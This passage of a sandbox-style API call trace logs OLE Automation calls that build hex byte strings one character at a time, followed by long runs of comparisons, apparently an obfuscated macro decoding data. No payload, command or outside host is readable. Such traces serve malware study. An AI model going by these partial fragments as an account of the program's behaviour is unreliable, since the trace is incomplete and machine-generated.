pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.980] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.980] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.980] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.980] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.980] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.980] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.980] VarBstrCat (in: bstrLeft="&H1", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.980] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.981] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.981] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.981] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.981] VarBstrCat (in: bstrLeft="&H8", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.981] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.981] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.981] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.981] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.981] VarBstrCat (in: bstrLeft="&Hf", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.982] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.982] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.982] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.982] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.982] VarBstrCat (in: bstrLeft="&H0", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.982] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.982] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.982] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.983] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.983] VarBstrCat (in: bstrLeft="&H2", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.983] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.983] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.983] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.983] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.983] VarBstrCat (in: bstrLeft="&Ha", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.983] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.983] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.983] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.984] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.984] VarBstrCat (in: bstrLeft="&Ha", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.984] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.984] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.984] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.984] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.984] VarBstrCat (in: bstrLeft="&Ha", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.984] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.984] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.984] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.984] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.985] VarBstrCat (in: bstrLeft="&Ha", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.985] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.985] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.985] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.985] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.985] VarBstrCat (in: bstrLeft="&Ha", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.985] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.985] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.986] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.986] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.986] VarBstrCat (in: bstrLeft="&Ha", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.986] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.986] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.986] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.986] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.986] VarBstrCat (in: bstrLeft="&Ha", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.986] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.987] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.987] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.987] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.987] VarBstrCat (in: bstrLeft="&H3", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.987] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.987] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.988] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.988] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.988] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.988] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.988] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.988] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.988] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.988] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.988] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.988] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.988] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.988] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.988] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.989] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.989] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.989] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.989] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.989] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.989] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.989] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.989] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.989] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.989] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.989] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.989] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.989] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.989] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.989] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.989] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.989] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.989] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.989] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.989] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.989] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.989] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.989] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.989] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.990] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.990] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.990] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.990] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.990] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.990] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.990] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.990] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.990] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.990] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.990] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.990] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.990] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.990] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.990] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.990] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.990] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.990] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.990] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.990] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.990] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.990] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.991] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.991] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.991] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.991] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.991] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.991] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.991] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.991] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.991] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.991] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.991] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.991] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.991] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.991] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.991] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.991] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.991] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.991] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.991] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.991] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.991] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.991] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.991] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.992] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.992] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.992] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.992] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.992] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.992] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.992] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.992] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.992] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.992] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.992] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.992] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.992] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.992] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.992] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.992] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.992] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.992] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.992] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.992] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.992] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.992] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.992] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.993] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.993] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.993] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.993] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.993] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.993] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.993] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.993] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.993] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.993] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.993] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.993] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.993] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.993] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.993] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.993] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.993] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.993] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.993] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.993] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.993] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.993] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.994] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.994] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.994] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.994] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.994] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.994] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.994] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.994] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.994] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.994] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.994] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.994] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.994] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.994] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.994] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.994] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.994] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.994] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.994] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.994] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.994] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.994] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.994] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.995] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.995] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.995] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.995] 